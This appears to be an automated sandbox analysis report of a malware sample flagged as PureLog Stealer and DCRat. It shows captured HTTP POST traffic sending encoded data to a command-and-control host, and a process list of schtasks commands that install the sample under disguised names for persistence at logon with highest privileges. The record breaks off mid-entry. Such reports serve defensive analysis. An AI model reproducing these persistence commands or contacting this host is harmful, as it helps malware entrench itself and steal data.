                                                                Oct 11, 2024 01:37:58.909178972 CEST2584OUTData Raw: 50 5d 58 58 51 58 5d 56 5e 5a 55 58 51 56 5a 5e 57 5b 58 58 55 52 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P]XXQX]V^ZUXQVZ^W[XXURQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+><Z+*823+56('<"7 0>:(("()+#Y$/\*-
                                                                Oct 11, 2024 01:37:59.009382963 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:59.185746908 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ZsHext02P3FCCMxEK147ek6W0vTJhh6qdBQvbBwbqpgtVgTcBONY%2FgZToCojSIlUVJuu%2B3L6uUFFxhM1IX3bY4OtRUz9Dwa9NuvQMVO8QANk6j88K9G%2FO3vzY%2Fp2GCqCb797D2f"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70ff8c08183d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                147192.168.2.550129188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:58.885106087 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:59.237411022 CEST2004OUTData Raw: 50 52 5d 5b 54 58 5d 56 5e 5a 55 58 51 53 5a 5a 57 50 58 5b 55 53 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PR][TX]V^ZUXQSZZWPX[USQ]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+? %='?6,X!#Y<#&4$ $1W>/50_)#Y$/\*9
                                                                Oct 11, 2024 01:37:59.328013897 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:59.618222952 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=msEAq0uHeIoGDibPbNad0ofhbBxS7ONtgJdJQaSUcLX87oxiOWOmrdgpwSeTHhRq7RHAmDfxucx1%2Bo1jA5zmZlnQFJjqyfIePqJVJZHA0VqG31z4s6FLY5MuJh9A%2Bkz5wWE0DOQF"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a71018b0c8c1d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 15 29 17 25 0f 23 3d 23 10 2f 31 23 00 3d 03 08 5d 3f 32 34 00 26 24 11 5c 2e 02 3a 0a 35 3b 3c 15 29 3f 2e 58 24 05 34 03 3f 31 2a 51 03 1b 3a 00 28 55 37 1c 3f 54 31 5b 2b 0b 3d 5c 33 23 36 1c 2a 13 31 55 33 3e 3e 58 21 57 34 53 2a 12 3f 1e 3b 05 33 44 29 38 00 11 23 11 2a 5f 08 13 39 51 3e 01 34 1d 21 09 00 07 35 3d 19 1f 36 00 3a 50 3e 07 08 54 27 0d 0a 1a 3b 0b 24 1d 34 2c 30 0f 22 12 0c 10 37 3d 01 02 27 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98')%#=#/1#=]?24&$\.:5;<)?.X$4?1*Q:(U7?T1[+=\3#6*1U3>>X!W4S*?;3D)8#*_9Q>4!5=6:P>T';$4,0"7='8"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                148192.168.2.550130188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:59.377307892 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:59.722132921 CEST2584OUTData Raw: 55 58 5d 5e 54 5e 5d 55 5e 5a 55 58 51 56 5a 5a 57 5e 58 55 55 53 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UX]^T^]U^ZUXQVZZW^XUUSQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y+='<*/%>3(&#!+3Y?U% '(3.%)++""$^>;#Y$/\*-
                                                                Oct 11, 2024 01:37:59.831024885 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:38:00.010857105 CEST591INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EBr%2FT9qakZeCWyffVmwphw6LqgJUQHXkdZL7NT1kH87JsFO3rHcq9Qc92yWqtsMTBKZv9ZGDIjzsbdLtRBM40vTwxbjT4bxuth2kFZmiFIWVBsfvXAcVkpmXX9xiT1jkhYlSyFoe"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7104a87e0f45-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                149192.168.2.550131188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:59.729629993 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:38:00.081047058 CEST2004OUTData Raw: 50 5a 5d 5f 51 5e 5d 56 5e 5a 55 58 51 57 5a 5b 57 58 58 58 55 5c 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PZ]_Q^]V^ZUXQWZ[WXXXU\QYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9\).?</1@+&36+Z?! <3*>!;(;#Y$/\*)
                                                                Oct 11, 2024 01:38:00.174015045 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:38:00.427695990 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:38:00 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2lyi1eTKQeEiKFy44bxsruDByJieXivkz7TU7khz1ludpEGJLvI5PKJao0TX7di6kbA4w4FGlT0fZRNrWpkpjTR0AktybM0uv6bMlD6Zp5%2BVEfqXn5V%2BdGrIhZJSEHG8a5ahk7y"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7106cb494238-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 59 3e 17 3e 56 22 2e 37 10 38 0f 0a 1d 29 2d 0f 06 3f 1f 0e 06 31 1a 3b 5d 2d 12 26 0a 22 38 30 58 3d 2f 3e 5b 24 2c 2c 04 28 0b 2a 51 03 1b 3a 02 3f 23 23 54 3c 22 03 19 3c 0b 31 59 27 30 29 44 2a 2d 35 1c 27 3d 25 05 21 32 28 1c 2a 02 0d 54 38 02 34 1a 3e 38 39 05 34 01 2a 5f 08 13 39 50 29 5e 20 1d 35 24 3d 5f 36 3d 37 52 20 3a 36 51 29 3a 39 08 25 33 27 07 2c 22 34 12 20 3f 3f 54 22 3f 3d 0d 20 13 0e 59 25 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'Y>>V".78)-?1;]-&"80X=/>[$,,(*Q:?##T<"<1Y'0)D*-5'=%!2(*T84>894*_9P)^ 5$=_6=7R :6Q):9%3',"4 ??T"?= Y%("_")Q?TR0


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:19:35:58
                                                                Start date:10/10/2024
                                                                Path:C:\Users\user\Desktop\lv961v43L3.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\lv961v43L3.exe"
                                                                Imagebase:0x40000
                                                                File size:3'554'304 bytes
                                                                MD5 hash:76802A2F25A771332D8C00EE56975818
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2012463361.0000000000042000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2085959223.0000000012641000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:19:36:02
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 7 /tr "'C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe'" /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:19:36:02
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "apERZQztEJsqymITPFxguVe" /sc ONLOGON /tr "'C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:19:36:02
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 7 /tr "'C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:19:36:02
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline"
                                                                Imagebase:0x7ff642880000
                                                                File size:2'759'232 bytes
                                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:19:36:02
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:19:36:03
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe
                                                                Imagebase:0x480000
                                                                File size:3'554'304 bytes
                                                                MD5 hash:76802A2F25A771332D8C00EE56975818
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 74%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:19:36:03
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71E1.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC7685716E115C40A19F7FCCC6DF33F58B.TMP"
                                                                Imagebase:0x7ff7750f0000
                                                                File size:52'744 bytes
                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:9
                                                                Start time:19:36:03
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe
                                                                Imagebase:0xf20000
                                                                File size:3'554'304 bytes
                                                                MD5 hash:76802A2F25A771332D8C00EE56975818
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:19:36:03
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.cmdline"
                                                                Imagebase:0x7ff642880000
                                                                File size:2'759'232 bytes
                                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:19:36:03
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:19:36:03
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73C6.tmp" "c:\Windows\System32\CSCCFFE6734440C4D2883932D483985654.TMP"
                                                                Imagebase:0x7ff7750f0000
                                                                File size:52'744 bytes
                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:13
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 6 /tr "'C:\Recovery\apERZQztEJsqymITPFxguVe.exe'" /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:14
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "apERZQztEJsqymITPFxguVe" /sc ONLOGON /tr "'C:\Recovery\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:15
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 10 /tr "'C:\Recovery\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:16
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 6 /tr "'C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe'" /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:17
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "apERZQztEJsqymITPFxguVe" /sc ONLOGON /tr "'C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:18
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 10 /tr "'C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:19
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe'" /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:20
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:21
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:22
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\SystemSettings.exe'" /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:23
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\Users\Default User\SystemSettings.exe'" /rl HIGHEST /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:24
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\SystemSettings.exe'" /rl HIGHEST /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:25
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "lv961v43L3l" /sc MINUTE /mo 11 /tr "'C:\Users\user\Desktop\lv961v43L3.exe'" /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:26
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "lv961v43L3" /sc ONLOGON /tr "'C:\Users\user\Desktop\lv961v43L3.exe'" /rl HIGHEST /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:27
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:schtasks.exe /create /tn "lv961v43L3l" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\lv961v43L3.exe'" /rl HIGHEST /f
                                                                Imagebase:0x7ff753860000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:28
                                                                Start time:19:36:04
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
